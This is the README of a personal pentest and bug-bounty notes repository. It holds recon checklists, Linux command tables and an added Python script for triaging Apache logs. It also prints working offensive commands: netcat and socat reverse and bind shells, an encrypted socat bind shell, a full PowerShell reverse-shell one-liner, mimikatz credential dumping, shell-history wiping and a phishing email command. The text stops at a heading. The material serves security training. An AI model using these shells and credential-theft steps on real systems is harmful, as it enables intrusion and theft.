███████╗ █████╗ ███████╗██╗ ██╗ ██████╗
██╔════╝██╔══██╗██╔════╝╚██╗ ██╔╝██╔════╝
█████╗ ███████║███████╗ ╚████╔╝ ██║ ███╗
██╔══╝ ██╔══██║╚════██║ ╚██╔╝ ██║ ██║
███████╗██║ ██║███████║ ██║ ╚██████╔╝
╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝
Made with <3 by Riccardo Malatesta (@seeu)
EasyG started out as a script that I use to automate some information gathering tasks for my hacking process, you can find it here. Now it's more than that. Here I gather all the resources about hacking that I find interesting: notes, payloads, tools and more.
I try as much as possible to link to the various sources or inspiration for these notes. A large part of these notes are from: PTS v4, PortSwigger Web Security Academy, PEN-200, TryHackMe, Jhaddix, The Cyber Mentor, NahamSec (and NahamCon), InfoSec Twitter and many other amazing people.
- Resources
- Useful tips
- Check-lists
- Linux
- Tools
- Passive Information Gathering (OSINT)
- Active Information Gathering
- Content Discovery
- Networking
- Source code review
- Vulnerability Scanning
- Web vulnerabilities
- SQL Injection
- Authentication vulnerabilities
- Directory Traversal
- File inclusion
- OS Command Injection
- Business logic vulnerabilities
- Information Disclosure
- Access control vulnerabilities and privilege escalation
- File upload vulnerabilities
- Server-side request forgery (SSRF)
- Open redirection
- XXE injection
- Cross-site scripting (XSS)
- Cross-site request forgery (CSRF)
- Cross-origin resource sharing (CORS)
- Clickjacking
- DOM-based vulnerabilities
- WebSockets
- Insecure deserialization
- Server-side template injection
- Web cache poisoning
- HTTP Host header attacks
- HTTP request smuggling
- OAuth authentication
- JWT Attacks
- GraphQL
- WordPress
- IIS - Internet Information Services
- Lotus Domino
- Git source code exposure
- Subdomain takeover
- 4** Bypass
- Application level Denial of Service
- APIs attacks
- Grafana attacks
- Confluence attacks
- Client-Side Attacks
- Thick client vulnerabilities
- DLL Hijacking
- Insecure application design
- Weak Hashing Algorithms
- Cleartext secrets in memory
- Hardcoded secrets
- Unsigned binaries
- Lack of verification of the server certificate
- Insecure SSL/TLS configuration
- Remote Code Execution via Citrix Escape
- Direct database access
- Insecure Windows Service permissions
- Code injection
- Windows persistence
- System Attacks
- Mobile
- Cloud hacking
- Artificial intelligence vulnerabilities
Blogs
Reports
News
Newsletter
- Bug Bytes
- Executive Offense
- The Unsupervised Learning Newsletter
- TLDR Newsletter
- Hive Five - securibee
- Vulnerable U
- The Security, Funded Newsletter
- For RCE
  - Never upload a shell at first, you can be banned from a program. Just execute a `whoami` as a PoC, and proceed with a shell only if required/allowed.
- For stored XSS
  - `console.log()` is better than `alert()`, it makes less noise, especially for stored XSS where every visitor of the page would otherwise get a pop-up.
- For SQLi
  - Don't dump the entire db, you can be banned from a program. Just retrieve the db's name, version and/or other minor info. Proceed with a db dump only if required/allowed;
  - Don't use tautologies like `OR 1=1`: if the injected statement turns out to be a DELETE or UPDATE, the condition matches every row. It's safer to use time-based checks like `AND SLEEP(5)` or a string concatenation like `te'+'st`, which proves the injection without widening the affected rows.
- For subdomain takeovers
  - Use as a PoC an html page with an unguessable name, like `9a69e2677c39cdae365b49beeac8e059.html`, containing only `<!-- PoC by seeu -->`
- For Metasploit: the port `4444` is very common with Metasploit, so it can trigger some warnings (AV/IDS signatures). Consider using another port if the exploit doesn't work.
Shells
- Shell: a command interpreter we obtain on the target; the difference between the two types below is which side opens the TCP connection
- Reverse shell: the victim connects back to a listener on the attacker's machine (works when the victim can reach us but we cannot reach it, e.g. behind NAT or an inbound-only firewall)
  - Attacker: `nc -lvp 4444`
  - Victim: `nc <ip_attacker> 4444 -e /bin/sh`
- Bind shell: the victim runs a listener and the attacker connects to it in order to get a shell (requires an inbound path to the victim's port)
  - Attacker: `nc <ip_victim> 4444`
  - Victim: `nc -lvp 4444 -e /bin/sh`
- Note: the `-e` option exists in netcat-traditional and in Nmap's `ncat`, but not in the OpenBSD netcat shipped by default on many distributions; check `nc -h` on the target before relying on it
Payloads
- Staged: sends the payload in stages (a small stager first, which then fetches the rest from the handler), can be less stable
  - example: `windows/meterpreter/reverse_tcp`
- Non-staged (stageless): sends the whole payload at once, larger in size, so it won't always fit where a small stager would
  - example: `windows/meterpreter_reverse_tcp`
- The name tells them apart: a `/` between the payload type and the transport (`meterpreter/reverse_tcp`) means staged, an `_` (`meterpreter_reverse_tcp`) means stageless
- HIPAA, a US framework that governs medical data
- PCI DSS, the standard that governs credit card and payment processing
- GDPR, an EU Regulation on data protection and privacy in the EU and the European Economic Area
- SMB-Checklist
- Win32 Offensive Cheatsheet
- Regexp Security Cheatsheet
- Cheat-Sheet - Active-Directory
- Security Testing of Thick Client Application
- OWASP Cheat Sheet Series
- OSSTMM
- MindMaps
- EasyG and all the connected tools
- Burp Suite and all the extensions
- Kali Linux since it has everything you need
See The Bug Hunter's Methodology v4.0 - Recon Edition by @jhaddix #NahamCon2020!
- Integrations
- Application Libraries (usually JavaScript)
- Application: Custom Code or COTS
- Application Framework
- Web Hosting Software (Default creds, Web server misconfigurations, web exploits)
- Open Ports and Services (Default creds on services, service level exploits)
- Passive Information Gathering (OSINT)
- Location information
- Satellite images
- Drone recon
- Building layout
- Target validation
- User Information Gathering
- Job Information
- Employees
- Pictures
- Active Information Gathering
- Finding subdomains
- Fingerprinting
- Content Discovery
- Vulnerability Scanning
- Penetration
- Initial Foothold
- Privilege Escalation
- Lateral Movement
- Maintaining access (Trojans)
- Cleaning up rootkits
- Covering tracks
- Reporting / Analysis
- Lessons Learned / Remediation
- Set up the environment
  - Create a dedicated folder
  - Create files like `creds.txt` and `computers.txt`
- Check that the targets are valid and owned by the client
- Start a port scan
  - `sudo nmap -sC -sV -oN nmap_results <IP> -vvv`
  - `rustscan <IP>`
- Search for CVEs and exploits for the identified services
- If there is a web server present
  - Use `whatweb <target>` to gain more information about the technology, then search for CVEs and exploits
  - Search for `robots.txt`, `.svn`, `.DS_Store`, `README.md`
  - Run a directory search
    - `dirsearch -u <target> -x 404 -e '*'`
    - `dirsearch -u <target> -w /usr/share/seclists/Discovery/Web-Content/big.txt -r -R 2 --full-url -t 75 --suffix=.php`
    - `gobuster dir -u <target> -w /usr/share/wordlists/dirb/common.txt -o results -x txt,pdf,config`
    - `gobuster dir -u <target> -x txt,php,html --wordlist /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -o results`
    - `dirbrute` with `/usr/share/wordlists/dirb/common.txt`
  - See the source code
  - Run `nikto` and `nuclei`
- If there is an FTP service present
  - Test default credentials / anonymous login
  - Search for CVEs and exploits
- If there is an SMB service present
  - Run `nmap -vvv -p 139,445 --script=smb* <IP>`
  - Test default credentials / anonymous login
  - Search for CVEs and exploits
- Exploit the machine
  - Example: exploit a Directory Traversal in a Web Application to read `/etc/passwd` or SSH private keys, like `id_rsa` or `id_ecdsa`
- Use what you found to access the machine
  - Example: crack the passphrase of `id_rsa` with `ssh2john id_rsa > ssh.hash` and `john --wordlist=/usr/share/wordlists/rockyou.txt ssh.hash`, then gain access with `ssh -i id_rsa <username>@<IP>`
- Elevate your privileges
  - In Windows, run `PowerUp.ps1` and then `Invoke-AllChecks`
  - Run winPEAS or linPEAS, and note:
    - System information
    - Network interfaces, known hosts, and DNS cache
    - Check what high privilege commands can be run
    - Config files, clear text passwords, connection strings etc.
    - AV information
    - Any information about applications used
    - Any other interesting file / info
  - Define all potential privilege escalation vectors
  - Use GTFOBins
- Password attack: test the credentials found to gain more access
  - `crackmapexec <service> <IP> -u usernames.txt -p passwords.txt --continue-on-success`
  - `crackmapexec <service> <IP> -u administrator -H <NTLM> --continue-on-success`
  - `crackmapexec <service> <IP> -u administrator -H <NTLM> --local-auth --lsa`
- Explore the services found
  - Example: enumerate SMB shares with `crackmapexec smb <IP> -u <user> -p <password> --shares`
- Client-side attack
  - Perform a Phishing attack
    - Run WebDAV and prepare the Windows Library and shortcut files
    - Send an email with `sudo swaks -t <recipient> -t <recipient> --from <sender> --attach @<Windows-Library-file> --server <IP> --body @body.txt --header "Subject: Staging Script" --suppress-data -ap` (`-t` is repeated once per recipient; `-ap` prompts for the SMTP password)
  - If you have more information, you could leverage Microsoft Office or Windows Library Files
- Once access to an internal network machine is gained, use again winPEAS or linPEAS
  - See step 2.3.
  - In Windows, verify the OS with `systeminfo` (winPEAS may falsely detect Windows 11 as Windows 10)
- Gain situational awareness
  - Create a file `computers.txt` to document identified internal machines and additional information about them
  - Check for Password Manager files, like `*.kdbx`
  - In Windows, enumerate the AD environment and its objects
    - Use `SharpHound.ps1` and `BloodHound`
  - Set up a SOCKS5 proxy to perform network enumeration via Nmap and CrackMapExec
  - Search for accessible services, open ports, and SMB settings
- Use credentials found to log in
- Find potential exploits
  - See step 1.3.
  - Use the Web Application to gain a shell as `NT AUTHORITY\SYSTEM`
- Cached Credentials
  - If there is no AV, consider upgrading the shell to Meterpreter for more advantages
  - Use mimikatz for this purpose
    - Run `privilege::debug` and `sekurlsa::logonpasswords`
- Lateral Movement
  - Leverage the domain admin privileges of one of the accounts found to get access to the domain controller
- Run EasyG assetenum
- Select the interesting targets
- Pass the subdomains to Burp Suite
- Open them in Firefox
- Check for mobile/desktop applications
- If there are any other non-web applications, use Apkleak and Source2Url (even if OoS)
- If every asset is in scope
- Recon
- Explore the app and every functionality (eventually, search for documentation)
- Crawl with Burp Suite
- Collect endpoints with BurpJSLinkFinder
- Content Discovery, use tools, Google Dorking and GitHub Dorking
- Check the Testing layers
- Authentication
- See Authentication vulnerabilities
- Account Section
- Upload Functions
- Email functions, check if you can send emails from the target
- Spoofing
- HTML Injection
- XSS
- Feedback functions
- Look for Blind XSS
- Broken Access Control, IDOR & co
- Content Types
- Look for multipart-forms
- Look for content type XML
- Look for content type json
- APIs
- Methods
- API Security Checklist
- Errors
- Change POST to GET
- OWASP Cheat Sheet Series, check also
- Look at the index of this repo and see if you've missed anything interesting
Note: a lot of these commands are from RTFM: Red Team Field Manual by Ben Clark and from PEN-200: Penetration Testing with Kali Linux by Offensive Security.
Linux Services and Networking
| Command | Description |
|---|---|
| `netstat -tulpn` | Show Linux network ports with process IDs (PIDs) |
| `watch ss -stplu` | Watch TCP, UDP open ports in real time with socket summary |
| `lsof -i` | Show established connections |
| `macchanger -m MACADDR INTR` | Change MAC address on Kali Linux |
| `ifconfig eth0 192.168.2.1/24` | Set IP address in Linux |
| `ifconfig eth0:1 192.168.2.3/24` | Add IP address to existing network interface in Linux |
| `ifconfig eth0 hw ether MACADDR` | Change MAC address in Linux using ifconfig |
| `ifconfig eth0 mtu 1500` | Change MTU size in Linux using ifconfig, change 1500 to your desired MTU |
| `dig -x 192.168.1.1` | Dig reverse lookup on an IP address |
| `host 192.168.1.1` | Reverse lookup on an IP address, in case dig is not installed |
| `dig @192.168.2.2 domain.com -t AXFR` | Perform a DNS zone transfer using dig |
| `host -l domain.com nameserver` | Perform a DNS zone transfer using host |
| `nbtstat -A x.x.x.x` | Get the NetBIOS hostname for an IP address (Windows command) |
| `ip addr add 192.168.2.22/24 dev eth0` | Adds a secondary IP address to an interface; it does not show up in `ifconfig` (which only lists labelled aliases), use `ip addr` to see it |
| `tcpkill -9 host google.com` | Blocks access to google.com from the host machine |
| `echo "1" > /proc/sys/net/ipv4/ip_forward` | Enables IP forwarding, turns the Linux box into a router, handy for routing traffic through a box |
| `echo "nameserver 8.8.8.8" > /etc/resolv.conf` | Use Google DNS (the file needs the `nameserver` keyword, a bare address is ignored) |
| `sudo systemctl start ssh` | Start the SSH service in Kali |
| `sudo ss -antlp \| grep sshd` | Confirm that SSH has been started and is running |
| `sudo systemctl enable ssh` | Configure SSH to start at boot time |
| `sudo systemctl start apache2` | Start the apache service in Kali |
| `sudo ss -antlp \| grep apache` | Confirm that apache has been started and is running |
| `sudo systemctl enable apache2` | Enable apache to start at boot time |
| `systemctl list-unit-files` | Display all available services |
| `ps -fe` | Common ps syntax to list all the processes currently running; `-f`: display full format listing (UID, PID, PPID, etc.), `-e`: select all processes, `-C`: select by command name |
| `sudo tail -f /var/log/apache2/access.log` | Monitor the Apache log file using the tail command |
Linux User Management
| Command | Description |
|---|---|
| `whoami` | Shows the currently logged in user on Linux |
| `id` | Shows the currently logged in user and the groups of the user |
| `last` | Shows last logged in users |
| `mount` | Show mounted drives |
| `df -h` | Shows disk usage in human readable output |
| `echo "user:passwd" \| chpasswd` | Reset a password in one line |
| `getent passwd` | List users on Linux |
| `strings /usr/local/bin/blah` | Shows the printable strings of non-text files, e.g. what's in a binary |
| `uname -ar` | Shows the running kernel version |
| `history` | Show bash history, commands the user has entered previously |
Linux File Commands
| Command | Description |
|---|---|
| `du -sh blah` | Display the size of a file / dir on Linux (`df` reports filesystem usage, not file size) |
| `diff file1 file2` | Compare / show differences between two files on Linux |
| `md5sum file` | Generate an MD5 sum on Linux |
| `md5sum -c blah.iso.md5` | Check a file against its MD5 sum on Linux, assuming both the file and the .md5 are in the same dir |
| `file blah` | Find out the type of a file on Linux, also displays if a binary is 32 or 64 bit |
| `dos2unix` | Convert Windows line endings to Unix / Linux |
| `base64 < input-file > output-file` | Base64 encodes the input file and outputs a Base64 encoded file called output-file |
| `base64 -d < input-file > output-file` | Base64 decodes the input file and outputs a Base64 decoded file called output-file |
| `touch -r ref-file new-file` | Creates a new file using the timestamp data from the reference file, drop the `-r` to simply create a file |
| `rm -rf` | Remove files and directories without prompting for confirmation |
| `mkdir -p pt/{recon,exploit,report}` | Creates a directory `pt` and inside of it the directories `recon`, `exploit` and `report` |
| `ls /etc/apache2/wwwold/*.conf` | Display files matching a pattern |
| `ls -a` | `-a` is used to display all files, including hidden ones |
| `ls -1` | Display each file on a single line |
| `ls -l` | Shows detailed information about the files and directories in a directory |
| `ls -la /usr/bin \| grep zip` | Search for any file(s) in /usr/bin containing "zip" |
| `pwd` | Print the current directory |
| `cd ~` | Return to the home/user directory |
| `echo "test1" > test.txt` | Saves "test1" in the new file "test.txt" |
| `echo "test2" >> test.txt` | Appends a new line "test2" to the file "test.txt" |
| `echo "hack::the::world" \| awk -F "::" '{print $1, $3}'` | Extract fields from a stream using a multi-character separator in awk |
| `comm scan-a.txt scan-b.txt` | Compare files |
| `diff -c scan-a.txt scan-b.txt` | Compare files, context format |
| `diff -u scan-a.txt scan-b.txt` | Compare files, unified format |
| `vimdiff scan-a.txt scan-b.txt` | Compare files using vim |
Misc Commands
| Command | Description |
|---|---|
| `init 6` | Reboot Linux from the command line |
| `gcc -o output input.c` | Compile C code (`-o` names the resulting binary, not a `.c` file) |
| `gcc -m32 -o output input.c` | Compile a 32-bit binary on 64-bit Linux (requires the 32-bit libc development files) |
| `unset HISTFILE` | Disable bash history logging for the current session (the variable is `HISTFILE`, not `HISTORYFILE`) |
| `kill -9 $$` | Kill the current session |
| `chown user:group blah` | Change the owner of a file or dir |
| `chown -R user:group blah` | Change the owner of a file or dir and all underlying files / dirs, recursive chown |
| `chmod 600 file` | Change file / dir permissions, see [Linux File System Permissions](#linux-file-system-permissions) for details |
| `cat /dev/null > ~/.bash_history` | Clear the bash history of the current user; combine with `unset HISTFILE`, otherwise bash writes the current session back to the file on exit |
| `man -k '^passwd$'` | See the documentation of a command. Use the flag `-k` for a keyword search |
| `man 5 passwd` | See section 5 of the documentation |
| `apropos descr` | See which description from the docs matches the input of apropos |
| `locate sbd.exe` | Locate "sbd.exe" |
| `sudo find / -name sbd*` | Perform a recursive search starting from the root of the file system and look for files that start with "sbd" |
| `which sbd` | Search `$PATH` for "sbd" |
| `apt-cache search pure-ftpd` | Search for the pure-ftpd application |
| `apt show resource-agents` | Examine information related to the resource-agents package |
| `sudo apt install pure-ftpd` | apt install the pure-ftpd application |
| `sudo apt remove --purge pure-ftpd` | apt remove `--purge` to completely remove the pure-ftpd application |
| `sudo dpkg -i man-db_2.7.0.2-5_amd64.deb` | dpkg `-i` to install the man-db application |
| `echo "I need to try hard" \| sed 's/hard/harder/'` | Replace a word in the output stream |
| `echo "Hack.The.World." \| cut -f 3 -d "."` | Extract fields from the echo command output using cut |
| `cut -d ":" -f 1 /etc/passwd` | Extract usernames from /etc/passwd using cut |
| `wc -m < test.txt` | Feed the wc command with the `<` operator |
| `cat test.txt \| wc -m` | Pipe the output of the cat command into wc |
| `wget -O report_w.pdf https://of.io/report.pdf` | Download a file with wget |
| `curl -o report_c.pdf https://of.io/report.pdf` | Download a file with curl |
| `axel -a -n 20 -o report_a.pdf https://of.io/report.pdf` | Download a file with axel; `-n`: number of multiple connections to use, `-a`: more concise progress indicator, `-o`: specify a different file name for the downloaded file |
| `alias lsa='ls -la'` | Create an alias "lsa" to execute the command "ls -la" |
| `alias mkdir='ping -c 1 localhost'` | Create an alias that overrides the mkdir command |
| `unalias mkdir` | Unset an alias |
| `cat ~/.bashrc` | Examine the user's ".bashrc" file; the system-wide file for Bash settings is "/etc/bash.bashrc" |
| `chmod +x file` | Make a file executable |
| `xfreerdp /u:<user> /p:<password> /cert:ignore /v:<ip>` | Connect with RDP (`/cert:ignore` skips certificate validation, so do not use it on untrusted networks) |
| `rdesktop -u <user> -p <password> <ip>` | Connect with RDP |
Linux environment variables
| Command | Description |
|---|---|
| `export vartest=8.8.8.8` | Declare an environment variable |
| `env` | See all declared environment variables |
| `$$` | Env var; the PID of the current shell instance |
| `$PATH` | Env var; list of directories the shell searches to locate executable files |
| `PATH=$PATH:/my/new-path` | Append a directory to PATH, handy for local FS manipulation |
| `$USER` | Env var; current user |
| `$PWD` | Env var; current directory path |
| `$HOME` | Env var; home directory path |
| `HISTCONTROL` | Env var; defines whether or not to remove duplicate commands from the history |
| `export HISTCONTROL=ignoredups` | Remove duplicates from our bash history |
| `export HISTIGNORE="&:ls:[bf]g:exit:history"` | Filter basic, common commands out of the history |
| `export HISTTIMEFORMAT='%F %T '` | Include the date/time in our bash history |
Linux File System Permissions
| Octal | Symbolic | Meaning |
|---|---|---|
| 777 | `rwxrwxrwx` | No restriction, global RWX, any user can do anything |
| 755 | `rwxr-xr-x` | Owner has full access, others can read and execute the file |
| 700 | `rwx------` | Owner has full access, no one else has access |
| 666 | `rw-rw-rw-` | All users can read and write but not execute |
| 644 | `rw-r--r--` | Owner can read and write, everyone else can read |
| 600 | `rw-------` | Owner can read and write, everyone else has no access |
Linux Directories
| Directory | Description |
|---|---|
| `/` | Also known as "slash" or the root |
| `/bin` | Common programs, shared by the system, the system administrator and the users |
| `/boot` | Boot files, boot loader (grub), kernels, vmlinuz |
| `/dev` | Contains references to system devices, files with special properties |
| `/etc` | Important system config files |
| `/home` | Home directories for system users |
| `/lib` | Library files, includes files for all kinds of programs needed by the system and the users |
| `/lost+found` | Files recovered by fsck after a filesystem failure are placed here |
| `/mnt` | Standard mount point for external file systems |
| `/media` | Mount point for external file systems (on some distros) |
| `/net` | Standard mount point for entire remote file systems (nfs) |
| `/opt` | Typically contains extra and third party software |
| `/proc` | A virtual file system containing information about system resources |
| `/root` | The root user's home dir |
| `/sbin` | Programs for use by the system and the system administrator |
| `/tmp` | Temporary space for use by the system, cleaned upon reboot |
| `/usr` | Programs, libraries, documentation etc. for all user-related programs |
| `/var` | Storage for all variable files and temporary files created by users, such as log files, mail queue, print spooler, web servers, databases etc. |
Linux Interesting Files / Directories
| Path | Description |
|---|---|
| `/etc/passwd` | Contains local Linux users |
| `/etc/shadow` | Contains local account password hashes |
| `/etc/group` | Contains local account groups |
| `/etc/init.d/` | Contains service init scripts, worth a look to see what's installed |
| `/etc/hostname` | System hostname |
| `/etc/network/interfaces` | Network interfaces |
| `/etc/resolv.conf` | System DNS servers |
| `/etc/profile` | System environment variables |
| `~/.ssh/` | SSH keys |
| `~/.bash_history` | User's bash history log |
| `/var/log/` | Linux system log files are typically stored here |
| `/var/adm/` | UNIX system log files are typically stored here |
| `/var/log/apache2/access.log` | Apache access log file, typical path (Debian/Ubuntu) |
| `/var/log/httpd/access.log` | Apache access log file, typical path (RHEL/CentOS) |
| `/etc/fstab` | File system mounts |
Examples
- Search the /etc/passwd file for users with a shell set to /bin/false and print the username and home directory of each user found:
  - `cat /etc/passwd | awk -F: '{if ($7 == "/bin/false") print "The user " $1 " home directory is " $6}'`
- Inspect Apache logs
  - Get the IPs in access.log, count their frequency and sort them:
    - `cat access.log | cut -d " " -f 1 | sort | uniq -c | sort -urn`
  - From the log file, pick one IP and list its request lines (the second `"`-delimited field is the `METHOD /path HTTP/x` request):
    - `cat access.log | grep '108.38.224.98' | cut -d "\"" -f 2 | uniq -c`
  - Further inspect that user's behavior, e.g. its hits on `/admin` (the trailing space avoids matching `/administrator`):
    - `cat access.log | grep '108.38.224.98' | grep '/admin ' | sort -u`
- Mounting a Shared Folder on a Linux Computer
  - `mount <NAS Ethernet Interface IP>:/share/<Shared Folder Name> <Directory to Mount>`
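The Apache log triage above (top talkers, the request lines of one IP, its hits on a sensitive path) done as an added example that is not part of the EasyG notes: a small Python parser for the combined log format, so that fields are matched by a regex rather than by `cut` positions, malformed lines are skipped instead of polluting the counts, and a simple "repeated 401 on `/admin` followed by a success" detector can be run on top. The log lines, IPs and paths below are constructed for the example.

```python
"""Added example (not from the EasyG page): access.log triage in Python.

The sample log is constructed; the parser targets Apache's "combined" format:
  client - user [time] "METHOD path proto" status size "referer" "user-agent"
"""
import re
from collections import Counter, defaultdict

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

# Constructed sample: one client probing /admin, one crawler, one garbage line.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Feb/2024:09:12:01 +0000] "GET / HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Feb/2024:09:12:02 +0000] "GET /admin HTTP/1.1" 401 52 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Feb/2024:09:12:03 +0000] "POST /admin HTTP/1.1" 401 52 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Feb/2024:09:12:04 +0000] "POST /admin HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Feb/2024:09:13:10 +0000] "GET /index.html HTTP/1.1" 200 1234 "-" "curl/8.0"
198.51.100.9 - - [10/Feb/2024:09:13:11 +0000] "GET /robots.txt HTTP/1.1" 404 196 "-" "curl/8.0"
this line is garbage and must be skipped
"""


def parse_log(text):
    """Yield one dict per well-formed line; lines that do not match are skipped."""
    for raw in text.splitlines():
        m = LINE_RE.match(raw)
        if m:
            entry = m.groupdict()
            entry["status"] = int(entry["status"])
            yield entry


def top_talkers(text):
    """Same result as `cut -d " " -f 1 | sort | uniq -c | sort -urn`: [(ip, hits), ...]."""
    return Counter(e["ip"] for e in parse_log(text)).most_common()


def requests_by_ip(text, ip):
    """Same idea as grepping one IP and cutting the quoted request line: Counter of 'METHOD path'."""
    return Counter(f'{e["method"]} {e["path"]}' for e in parse_log(text) if e["ip"] == ip)


def admin_bruteforce_candidates(text, path="/admin", min_failures=2):
    """IPs that collected >= min_failures 401s on `path` and then got a 2xx/3xx on it.

    A 401 burst followed by a success on the same path from the same client is
    the shape of a credential-guessing attempt that eventually worked.
    """
    failures = defaultdict(int)
    succeeded = set()
    for e in parse_log(text):
        if e["path"] != path:
            continue
        if e["status"] == 401:
            failures[e["ip"]] += 1
        elif 200 <= e["status"] < 400 and failures[e["ip"]] >= min_failures:
            succeeded.add(e["ip"])
    return sorted(succeeded)


if __name__ == "__main__":
    for ip, hits in top_talkers(SAMPLE_LOG):
        print(f"{hits:6d} {ip}")
    print(requests_by_ip(SAMPLE_LOG, "203.0.113.7"))
    print("possible successful brute force from:", admin_bruteforce_candidates(SAMPLE_LOG))
```

To run it on a real file, replace `SAMPLE_LOG` with `open("access.log").read()`; the regex is anchored at the start of the line only, so the referer and user-agent fields can be absent (common log format) without breaking the parse.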
EasyG is a script that I use to automate some information gathering tasks for my hacking process. It uses: amass, subfinder, github-subdomains, gobuster, anew, httprobe, naabu and nuclei. Install the necessary tools with `install.bat` or `install.sh` and then run `ruby easyg.rb`.
- XSS all the things some payloads to find XSS in various places
- lists
- findtheevent.txt and findthetag.txt helps me test for XSS faster, created with the help of Cross-site scripting (XSS) cheat sheet
- scripts
- fg.rb a copy of tomnomnom/gf made in ruby
- paramspider_support.rb use paramspider with a list of targets as an input
- shells to test file uploads
- To add a domain + subdomains in advanced scopes: `^(.*\.)?test\.com$`
- To fix visual glitches
- To add a new header
  1. Go to Proxy -> Options -> Match and Replace -> Add
  2. Change Type to Request Header
  3. As the default text says in Match, 'leave blank to add a new header'
  4. Put the new header in Replace
- Analyze the results from Intruder better with Settings > "Grep - Extract"
  - Manually select in the response the value that you want to track in a new column of the results
Cool extensions
- Turbo Intruder
- HTTP Request Smuggler
- Wsdler to interact with SOAP
- InQL
- Swagger-EZ
- BurpCustomizer
- Software Version Reporter
- Software Vulnerability Scanner
- IP Rotate
- Autorize
- BurpJSLinkFinder
- Anonymous Cloud
- Upload Scanner
- JWT Editor
- GetAllParams evolution
- Burp Bounty
Browser extensions
- Trufflehog Chrome Extension
- Wappalyzer
- DotGit
- Cookie-Editor
- Shodan for Chrome and for Firefox
- If you are using FireFox, you could use FoxyProxy
Misc Commands
| Command | Description |
|---|---|
| `nc -nv <IP> <port>` | Connect to a TCP port |
| `nc -nlvp <port>` | Set up a listener |
| `nc -nv <IP> <port>` | Connect to a listener |
| `nc -nlvp <port> > incoming.exe` | Receive a file |
| `nc -nv <IP> <port> < /usr/share/windows-resources/binaries/wget.exe` | Transfer a file |
| `nc -nlvp <port> -e cmd.exe` | Set up a bind shell |
| `nc -nv <IP> <port> -e /bin/bash` | Send a reverse shell |
Port Scanning
| Command | Description |
|---|---|
| `nc -nvv -w 1 -z <IP> <PORT-RANGE>` | Use netcat to perform a TCP port scan |
| `nc -nv -u -z -w 1 <IP> <PORT-RANGE>` | Use netcat to perform a UDP port scan |
Misc Commands
| Command | Description |
|---|---|
| `socat - TCP4:<remote server's ip address>:80` | Connect to a remote server on port 80 |
| `socat TCP4-LISTEN:<PORT> STDOUT` | Create a listener |
| `socat -d -d TCP4-LISTEN:<PORT> STDOUT` | Create a listener, `-d -d` for more verbosity |
| `socat TCP4-LISTEN:<PORT>,fork file:secret.txt` | Transfer a file |
| `socat TCP4:<IP>:<PORT> file:received_secret.txt,create` | Receive a file |
| `socat TCP4:<IP>:<PORT> EXEC:/bin/bash` | Send a reverse shell |
| `socat OPENSSL-LISTEN:<PORT>,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash` | Create an encrypted bind shell |
| `socat - OPENSSL:<IP>:<PORT>,verify=0` | Connect to an encrypted bind shell |
Reverse Shell
| Command | Description |
|---|---|
| `socat -d -d TCP4-LISTEN:<PORT> STDOUT` | User 1, create a listener |
| `socat TCP4:<IP>:<PORT> EXEC:/bin/bash` | User 2, send a reverse shell to User 1 |
Encrypted bind shell with OpenSSL
- `openssl req -newkey rsa:2048 -nodes -keyout bind_shell.key -x509 -days 365 -out bind_shell.crt`
  - `req`: initiate a new certificate signing request
  - `-newkey`: generate a new private key
  - `rsa:2048`: use an RSA key with a 2,048-bit length
  - `-nodes`: store the private key without passphrase protection
  - `-keyout`: save the key to a file
  - `-x509`: output a self-signed certificate instead of a certificate request
  - `-days`: set the validity period in days
  - `-out`: save the certificate to a file
- `cat bind_shell.key bind_shell.crt > bind_shell.pem`
- `sudo socat OPENSSL-LISTEN:<PORT>,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash` create the encrypted bind shell
- `socat - OPENSSL:<IP>:<PORT>,verify=0` connect to the encrypted bind shell
- Note: `verify=0` disables certificate verification on both ends, so the channel is encrypted but not authenticated; anyone who can reach the port gets the shell, and a MITM on the path could impersonate either side
Misc Commands
| Command | Description |
|---|---|
| `Set-ExecutionPolicy Unrestricted` | Set the PowerShell execution policy |
| `Get-ExecutionPolicy` | Get the value of ExecutionPolicy |
| `(new-object System.Net.WebClient).DownloadFile('http://<IP>/<filename>','C:\<DIR>\<filename>')` | Download a file |
| `iwr -uri http://<IP>/<filename> -Outfile <filename>` | Download a file (`iwr` is the alias of `Invoke-WebRequest`) |
| `powershell -c "command"` | The `-c` option will execute the supplied command as if it were typed at the PowerShell prompt |
Encode PowerShell from the command line
- `echo "iex(cmd)" | iconv -t UTF-16LE | base64 -w 0 | xclip -sel clip`
  - PowerShell's `-EncodedCommand` expects the base64 of the UTF-16LE bytes of the script, which is why the `iconv` step is needed; plain `base64` of ASCII text will not decode to a valid command
Send a reverse shell with PowerShell
- One-liner:
  - `powershell -c "$client = New-Object System.Net.Sockets.TCPClient('<IP>',<PORT>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i =$stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"`
- Same payload, readable form (to paste into an existing PowerShell session or a `.ps1`):
  - `$client = New-Object System.Net.Sockets.TCPClient('<IP>',<PORT>); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) { $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush(); } $client.Close();`
Set up a bind shell with PowerShell
